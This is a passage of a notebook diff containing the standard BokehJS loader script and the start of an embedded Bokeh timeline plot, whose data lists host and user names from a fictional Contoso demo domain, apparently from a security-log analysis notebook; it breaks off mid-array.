+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2301\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2301\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"7e64b64a-2052-48e5-9106-abc7c48e5ba7\" data-root-id=\"2373\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"08f6b267-f6fd-4dc4-a443-1aabb22658f7\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"2303\"},{\"id\":\"2343\"}]},\"id\":\"2373\",\"type\":\"Column\"},{\"attributes\":{\"axis\":{\"id\":\"2314\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2317\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2384\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2386\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2388\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2318\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2321\",\"type\":\"Grid\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2390\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"2327\"}},\"id\":\"2323\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2385\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data\":{\"Computer\":[\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"AdminPc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"WVD-0.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\",\"ContosoDc.Contoso.Azure\"],\"UserId\":[\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--AdminPc\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"ContosoAdmin--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\